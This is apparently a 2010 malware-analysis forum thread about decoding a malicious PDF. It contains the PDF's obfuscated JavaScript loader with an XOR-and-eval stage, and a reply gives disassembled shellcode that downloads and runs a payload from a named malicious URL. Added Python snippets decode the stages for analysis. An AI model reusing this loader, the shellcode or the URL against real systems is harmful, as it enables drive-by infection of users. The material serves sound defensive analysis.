Author Topic: PDF FILE  (Read 3389 times)


September 02, 2010, 06:24:31 am

MADY

Hi,

Attached is a PDF file and I tried to decode it using pdf-parser. I was not able to find out the URL of the payload. Please could someone help me on this.

http://jsunpack.jeek.org/dec/go?report=a63ed320cbc6b56496e1348793778864ff6f189f

I have done my decoding up to this level

>pdf-parser.py --object 11 --raw --filter a.pdf

Code: [Select]
var mailSend = String;
var sdsdf = 1;                      // page index handed to the word functions (0-based in Acrobat)
var foxit = "";                     // accumulates the decoded second stage
var check = 101;                    // XOR key applied to every byte
var d = ["ev", "", "al"];
v = new String(d[0] + d[2] + d[1]);                                  // "eval"
var unlock = ["p", "p", "", "a"];
checkArray = new String(unlock[3] + unlock[0] + unlock[0] + unlock[2]); // "app"
var dsjkgAdobe = new String("DEYfrom".substr(3) + "Char" + "CodePxvj".substr(0, 4)); // "fromCharCode"
var window = "IRScharC".substr(3) + "odeAt";                         // "charCodeAt"
var sdrt = "unes" + "cape";                                          // "unescape"
var dA = new String("getP" + "ageN" + "umWo" + "rds");               // "getPageNumWords"
var mailD = "8jKgetP".substr(3) + "zU6ageN".substr(3) + "thWo" + "rdMPLH".substr(0, 2); // "getPageNthWord"
function b(unlockA, sdfjhD) { return unlockA ^ sdfjhD; }
var google = "7wqsubst".substr(3) + "5bBrbB5".substr(3, 1);          // "substr"
var sdftuf = 0;
var bSdfj = new String("%irFT".substr(0, 1));                        // "%"
var emailSdrt = 2;
var checkArray = this[checkArray];                                   // this.app (unused afterwards)
var dDsjkg = this[dA](sdsdf);                                        // this.getPageNumWords(1)
var cFoxit = this[v];                                                // eval
var sdsdfU = this[sdrt];                                             // unescape
for (var sdB = sdftuf; sdB < dDsjkg; sdB++) {
    dDs = this[mailD](sdsdf, sdB);                                   // this.getPageNthWord(1, sdB)
    var uSend = dDs[google](dDs.length - emailSdrt, emailSdrt);      // last two characters of the word
    var checkArraySdftuf = bSdfj + uSend;                            // "%xx"
    var googleC = sdsdfU(checkArraySdftuf);                          // unescape("%xx") -> one byte
    var dsCheck = googleC[window](sdftuf);                           // charCodeAt(0)
    var sdftufGet = b(dsCheck, check);                               // XOR with 101
    foxit += mailSend[dsjkgAdobe](sdftufGet);                        // String.fromCharCode(...)
}
cFoxit(foxit);                                                       // eval the rebuilt script

I am not sure how to proceed further...

Thanks
MAD
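The decoding loop in object 11 can be replayed outside Acrobat. The following is an added example, not code from the thread: it assumes the words of the page have already been extracted (for instance from the page's text stream) and mirrors the script's per-word steps, including what unescape() does with a non-hex tail.

```python
# Added example (not from the thread). The obfuscated script takes every word
# of one page, keeps the word's last two characters, feeds "%xx" to unescape(),
# takes charCodeAt(0) and XORs it with 101 before appending it to the eval buffer.

HEX_DIGITS = "0123456789abcdefABCDEF"


def decode_word(word: str, key: int = 101) -> str:
    """Mirror unescape("%" + last2).charCodeAt(0) ^ key, then fromCharCode."""
    tail = word[-2:]
    if len(tail) == 2 and all(c in HEX_DIGITS for c in tail):
        code = int(tail, 16)          # unescape("%4c") -> "\x4c"
    else:
        # unescape() leaves an invalid "%zz" untouched, so charCodeAt(0) is '%'
        code = ord("%")
    return chr(code ^ key)


def decode_stage2(words, key: int = 101) -> str:
    """Rebuild the string the script hands to eval() from the page's words."""
    return "".join(decode_word(w, key) for w in words)


def words_from_text(page_text: str):
    """Whitespace split; an approximation of Acrobat's getPageNthWord boundaries."""
    return page_text.split()


# Constructed sample input: words whose last two hex digits decode to "alert(1)".
# In the real document these are the words Acrobat returns for page index 1.
SAMPLE_PAGE_TEXT = "qa04 zx09 kl00 mn17 op11 rs4d tu54 vw4c"

if __name__ == "__main__":
    print(decode_stage2(words_from_text(SAMPLE_PAGE_TEXT)))   # alert(1)
```

Run it against the words of the page the script indexes; if the result is not valid JavaScript, the word boundaries differ from Acrobat's and the words need re-extracting.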


September 02, 2010, 06:25:33 am
Reply #1

MADY

Forgot to attach the file ???

September 03, 2010, 01:29:41 am
Reply #2

MAD

Hi,

Code: [Select]
0X00  33C0              XOR EAX,EAX
0X02  648B4030          MOV EAX,[FS:EAX+0X30]
0X06  780C              JS 0X14
0X08  8B400C            MOV EAX,[EAX+0XC]
0X0B  8B701C            MOV ESI,[EAX+0X1C]
0X0E  AD                LODSD
0X0F  8B5808            MOV EBX,[EAX+0X8]
0X12  EB09              JMP SHORT 0X1D
0X14  8B4034            MOV EAX,[EAX+0X34]
0X17  8D407C            LEA EAX,[EAX+0X7C]
0X1A  8B583C            MOV EBX,[EAX+0X3C]
0X1D  6A44              PUSH BYTE +0X44
0X1F  5A                POP EDX
0X20  D1E2              SHL EDX,1
0X22  2BE2              SUB ESP,EDX
0X24  8BEC              MOV EBP,ESP
0X26  EB4F              JMP SHORT 0X77
0X28  5A                POP EDX
0X29  52                PUSH EDX
0X2A  83EA56            SUB EDX,BYTE +0X56
0X2D  895504            MOV [EBP+0X4],EDX
0X30  56                PUSH ESI
0X31  57                PUSH EDI
0X32  8B733C            MOV ESI,[EBX+0X3C]
0X35  8B743378          MOV ESI,[EBX+ESI+0X78]
0X39  03F3              ADD ESI,EBX ; MATH
0X3B  56                PUSH ESI
0X3C  8B7620            MOV ESI,[ESI+0X20]
0X3F  03F3              ADD ESI,EBX ; MATH
0X41  33C9              XOR ECX,ECX
0X43  49                DEC ECX
0X44  50                PUSH EAX
0X45  41                INC ECX
0X46  AD                LODSD
0X47  33FF              XOR EDI,EDI
0X49  360FBE1403        MOVSX EDX,BYTE [SS:EBX+EAX]
0X4E  38F2              CMP DL,DH
0X50  7408              JZ 0X5A
0X52  C1CF0D            ROR EDI,0XD
0X55  03FA              ADD EDI,EDX
0X57  40                INC EAX
0X58  EBEF              JMP SHORT 0X49
0X5A  58                POP EAX
0X5B  3BF8              CMP EDI,EAX
0X5D  75E5              JNZ 0X44
0X5F  5E                POP ESI
0X60  8B4624            MOV EAX,[ESI+0X24]
0X63  03C3              ADD EAX,EBX ; MATH
0X65  668B0C48          MOV CX,[EAX+ECX*2]
0X69  8B561C            MOV EDX,[ESI+0X1C]
0X6C  03D3              ADD EDX,EBX ; MATH
0X6E  8B048A            MOV EAX,[EDX+ECX*4]
0X71  03C3              ADD EAX,EBX ; MATH
0X73  5F                POP EDI
0X74  5E                POP ESI
0X75  50                PUSH EAX
0X76  C3                RET
0X77  8D7D08            LEA EDI,[EBP+0X8]
0X7A  57                PUSH EDI
0X7B  52                PUSH EDX
0X7C  B833CA8A5B        MOV EAX,0X5B8ACA33
0X81  E8A2FFFFFF        CALL 0X28
0X86  32C0              XOR AL,AL
0X88  8BF7              MOV ESI,EDI
0X8A  F2AE              REPNE SCASB
0X8C  4F                DEC EDI
0X8D  B8652E6578        MOV EAX,0X78652E65
0X92  AB                STOSD
0X93  6698              CBW
0X95  66AB              STOSW
0X97  B06C              MOV AL,0X6C
0X99  8AE0              MOV AH,AL
0X9B  98                CWDE
0X9C  50                PUSH EAX
0X9D  686F6E2E64        PUSH DWORD 0X642E6E6F
0XA2  6875726C6D        PUSH DWORD 0X6D6C7275
0XA7  54                PUSH ESP
0XA8  B88E4E0EEC        MOV EAX,0XEC0E4E8E
0XAD  FF5504            CALL NEAR [EBP+0X4]
0XB0  93                XCHG EAX,EBX
0XB1  50                PUSH EAX
0XB2  33C0              XOR EAX,EAX
0XB4  50                PUSH EAX
0XB5  50                PUSH EAX
0XB6  56                PUSH ESI
0XB7  8B5504            MOV EDX,[EBP+0X4]
0XBA  83C27F            ADD EDX,BYTE +0X7F
0XBD  83C231            ADD EDX,BYTE +0X31
0XC0  52                PUSH EDX
0XC1  50                PUSH EAX
0XC2  B8361A2F70        MOV EAX,0X702F1A36
0XC7  FF5504            CALL NEAR [EBP+0X4]
0XCA  5B                POP EBX
0XCB  33FF              XOR EDI,EDI
0XCD  57                PUSH EDI
0XCE  56                PUSH ESI
0XCF  B898FE8A0E        MOV EAX,0XE8AFE98
0XD4  FF5504            CALL NEAR [EBP+0X4]
0XD7  57                PUSH EDI
0XD8  B8EFCEE060        MOV EAX,0X60E0CEEF
0XDD  FF5504            CALL NEAR [EBP+0X4]

GetTempPathA
LoadLibraryA
WinExec("http://vxoyqgcp.cn/el245/viewtop.php?spl=pdf_9apr",...)
ExitThread

Look here, http://www.malwaredomainlist.com/forums/index.php?topic=1544.msg18995#msg18995

Forgot to attach the file? Take a look on JSUNPACK -> File information (3 files), Download zip | Explanation

Regards,
MAD
pinpin sayz: All ur PE's bel0ng 2 Us
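The loop at 0x44-0x5D in the disassembly above (ROR EDI,0xD then ADD EDI,EDX over each export-name byte until the NUL) is the ror13-add API hash, and the constants loaded into EAX before each CALL [EBP+4] are the hashes being resolved. The block below is an added example, not code from the thread: it reimplements that hash so the constants can be checked against a candidate name list, which is an assumption here and would normally be the full export table of the DLLs involved.

```python
# Added example (not from the thread): ror13-add hash as computed by the
# shellcode's lookup loop, plus a resolver for the constants it pushes.

def ror32(value: int, count: int) -> int:
    """32-bit rotate right, as ROR EDI,0xD does."""
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """h = ror(h, 13) + byte for every byte of the name; the NUL is not added."""
    h = 0
    for byte in name.encode("ascii"):
        h = (ror32(h, 13) + byte) & 0xFFFFFFFF
    return h


# Hash constants copied from the disassembly above, in the order they are used.
HASHES_IN_SHELLCODE = [0x5B8ACA33, 0xEC0E4E8E, 0x702F1A36, 0x0E8AFE98, 0x60E0CEEF]

# Assumed candidate list; replace with the real export names of kernel32 and
# whichever library the LoadLibraryA call pulls in.
CANDIDATES = [
    "GetTempPathA", "LoadLibraryA", "URLDownloadToFileA", "WinExec",
    "ExitThread", "ExitProcess", "GetProcAddress", "CreateFileA",
]


def resolve(hashes, candidates):
    """Pair each hash with the candidate name that produces it, or None."""
    table = {ror13_hash(n): n for n in candidates}
    return [(h, table.get(h)) for h in hashes]


if __name__ == "__main__":
    for h, name in resolve(HASHES_IN_SHELLCODE, CANDIDATES):
        print(f"0x{h:08X} -> {name}")
```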

September 03, 2010, 09:23:30 am
Reply #3

MADY

Thanks a lot for your prompt reply.

As I told already, I am able to do 1st-level decoding and it's very difficult to do the next level manually. I am a newbie and very much interested in decoding the PDF to find out the URL of the payload.

Your explanation is very difficult to understand since I am new to this area, and I am expecting your detailed & step-by-step explanation on how to get the URL. Please :(


Thanks in Advance
MAD